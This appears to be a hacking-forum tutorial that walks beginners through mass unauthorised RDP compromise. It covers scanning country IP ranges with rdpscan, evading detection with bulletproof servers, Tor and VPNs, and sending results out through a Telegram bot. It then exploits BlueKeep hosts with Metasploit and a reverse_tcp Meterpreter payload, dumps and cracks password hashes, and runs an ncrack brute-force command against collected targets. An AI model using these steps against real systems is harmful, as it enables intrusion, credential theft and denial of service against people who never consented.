No proprietary software! Everything is explained so simply that even an absolute beginner will understand it the first time!
RDP (Remote Desktop Protocol) is a protocol developed by Microsoft. It lets a user connect to a remote computer over a network and control it as if they were sitting in front of it.
In simple terms: you get the desktop of a Windows machine, but the machine is somewhere else.
A brute force attack, in turn, is a method of trying login and password combinations until one works. It exploits the fact that many different people use the same weak passwords.
In simple terms: people find it hard to come up with complex passwords, and attackers take advantage of that.
On the network, connected devices are identified by IP addresses. Each address has 65,536 TCP ports (and as many UDP ports). It is easier to picture this with an analogy: if the world is a huge planet of shopping malls, then IP addresses are the addresses of the malls, and ports are specific stores inside them. The standard port for RDP is TCP 3389.
Both on this planet and on the network there are territories and their sovereigns. You choose a country by its top-level domain (ccTLD) using the list TLD-Country-Bounds .
Having made the choice, convert the country code into IP ranges using the RIR delegation data from the repository RIR-IP by country .
Step two is port scanning.
Masscan finds open ports almost instantly, but there are nuances. A port can be open, closed, or filtered by a firewall, and an open 3389 does not guarantee that an RDP service is behind it. In practice the vast majority of masscan hits either do not run RDP on that port or never complete an RDP handshake, so they are useless for the task. That only becomes clear after nmap service detection, and nmap takes time.
So the masscan + nmap bundle (or another service identifier) works, but I found a much more interesting option.
GitHub, the moon of my life, offers the solution I use: GitHub - robertdavidgraham/rdpscan: A quick scanner for the CVE-2019-0708 "BlueKeep" vulnerability .
It is actually a scanner for one specific vulnerability, CVE-2019-0708, known as BlueKeep. Surprisingly, despite its age, hosts with this vulnerability still show up in the results. I will talk about how to handle them later.
The important thing here is that the same tool can be used to find addresses where an RDP service is actually running, because it performs an RDP handshake rather than just checking whether the port is open.
Let's look at the program's documentation in the repository. It accepts a range of IP addresses and prints one result line per address, which can be in one of several states:
- UNKNOWN — we do not work with such addresses.
- VULNERABLE — hosts with vulnerability CVE-2019-0708. We save them, we will talk about them later.
- SAFE - the host is not vulnerable to BlueKeep, but may be suitable for further brute force attack if the state is specified as SAFE or SAFE - CredSSP/NLA.
- SAFE - not RDP - for obvious reasons not suitable for brute force attack.
The documentation states that the program can be combined with masscan to speed up the check, although it is quite fast on its own. Moreover, a glance at the code shows that it borrows fragments from masscan.
Clone the repository. To build the executable, run make in the program folder. You may need to install additional packages. If errors occur, just copy them and send them to ChatGPT for correction.
Sometimes the program's workflow needs tweaking. For example, if the program does not read targets from a text file the way you want, write a small wrapper yourself in any language: Python, Bash, Go.
The program works with IP address ranges, and at the collection stage we produced a text file of them. A little automation: the wrapper feeds the program the file line by line and saves its output to another file. The same effect can be had by simply redirecting the output with >> res.txt in a Linux terminal.
Pay attention to the line cmd := exec.Command("./rdpscan", "--workers", "350", ip). Increasing the number (the third argument) speeds the program up. This is rdpscan's own --workers option, the number of hosts it probes concurrently; the Go wrapper only passes it through, so it is not a count of goroutines. 350 is a small value, but it is fast enough for what is essentially a port scanner, because the brute force itself will take far longer.
At this stage it is advisable to run everything on a remote machine. The problem with anonymity is that it is not abstract: everything on the network is literally a physical device somewhere. So is anonymity possible at all? Or is Stolyarov not so crazy, just taking it too much to heart?
Where do you find abuse-resistant servers, or bulletproof, as they say? Take any Ubuntu Server, set up VNC on it (a remote desktop protocol, roughly the Linux counterpart of RDP), open it to all IPs with plain login-and-password authentication, and keep logs. Check the logs twice a day. You are not interested in every address, only the ones that try to guess the login and password, that is, the ones actually trying to break in. Look such an IP up at https://whatismyipaddress.com/ and google the ISP. Congratulations, you found a bulletproof host.
But what if you are not sure about the server? Back up.
This code solves the following problem: saving the results and backing them up via a Telegram bot. The compiled rdpscan binary must be in the same folder as the main.go script.
To do this, you need to create a Telegram bot and find out the chat ID. Instructions can be found, for example, here: Create a Telegram Bot and Obtain the Chat ID - Step-by-Step Guide - YouTube .
At the specified interval the code creates (or overwrites) an archive containing the program's text log and the list of addresses already checked, then sends the archive to the chat through the bot. Access to the shared state is synchronized with mutexes.
The parameters that need to be configured:
- telegramToken — your bot's token.
- chatID — ID of the chat to send messages to.
- intervalMinutes - the time interval, set to 60 minutes by default (this can be changed).
The bot needs to run as a separate script so that it can receive messages. The bot script also needs the telegramToken.
The resulting log file can be processed using a script that divides hosts into two categories:
- hosts with vulnerability
- hosts for brute force
The output is two lists of IP addresses.
Run the script in the folder containing output.txt. It creates two files:
- forBruteIp.txt — list of hosts for brute force,
- BlueKeep.txt - list of hosts with BlueKeep vulnerability.
Speaking from practice: from 20 IP ranges we found just over 1,100 hosts for brute force and one host with BlueKeep. The check took several hours.
On hiding the work on a VPS: you can use Tor and a VPN. For example, the check script runs fine under torify, which pushes its traffic through Tor. Traffic can also be sent through a VPN, but that part is theory for me. The point is that brute force activity can trigger the provider, whereas heavy traffic through a VPN is less conspicuous. Brute force is a large volume of traffic in any case, but globally a VPN is not very suspicious; many product IT companies run their employees through a VPN for security. Tor traffic is probably more suspicious, but remember that all servers are physical computers.
Do not forget nohup (or a tmux/screen session), otherwise the running scripts stop as soon as the SSH session ends.
Well, first, let's deal with the hosts under CVE-2019-0708. It is an old vulnerability, so some of these hosts may well be honeypots. In a few words: it is a use-after-free in the kernel-mode RDP driver (the MS_T120 virtual channel), reachable before authentication, rather than a simple buffer overflow, and a great deal has been written about it. Here I only want to answer how exactly to exploit it.
To compare your numbers with Shodan, use the dork vuln:cve-2019-0708. Scanning the ranges yourself turns up more hosts than Shodan shows!
Let's use Metasploit. Install it and start it with msfconsole. Select the module with use exploit/windows/rdp/cve_2019_0708_bluekeep_rce, set RHOSTS to the address on which the scanner reported the vulnerability (for example set RHOSTS 127.0.0.1 as a placeholder), set the payload with set PAYLOAD windows/x64/meterpreter/reverse_tcp, and set LHOST to the IP address of the machine you are exploiting from. Then run exploit. If everything went well we get a Meterpreter session; this is far from guaranteed, and a failed attempt typically crashes the target with a blue screen. Then dump the password hashes with hashdump, crack them with Hashcat or John the Ripper, and you have connection credentials. Here is a good demonstration: BlueKeep RDP Vulnerability CVE-2019-0708 Exploit in Metasploit - Video 2021 with InfoSec Pat.
The next step is to collect login and password lists. I would not recommend lists that lack special characters and capital letters, such as this one: https://github.com/jeanphorn/wordlist/bl...sslist.txt . In my opinion a good repository is https://github.com/danielmiessler/SecLis.../Passwords , and good logins can be found at https://github.com/danielmiessler/SecLis.../Usernames . The list can also be compiled from previously leaked passwords of thematically similar sites, accesses or logs.
After downloading several files, merge them with a script that keeps only unique lines of at least 4 characters and shuffles them.
The final step is running the brute force. I suggest ncrack. I have not compared them myself, but I read an article in which ncrack beat Hydra and Medusa on RDP brute force speed.
Command: ncrack -v -f -CL -U usernames.txt -P passwords.txt -iL targets.txt -p 3389 -oN results.txt
The -f flag makes ncrack stop cracking a given service as soon as one valid credential is found for it, so it does not waste time on a host that is already done; the run continues with the remaining targets. Results are written to the file given with -oN. Check back in a couple of days. It is also worth experimenting with the timing templates `-T0` to `-T5` (higher is faster, but more likely to trip account lockouts and rate limits).
Bye.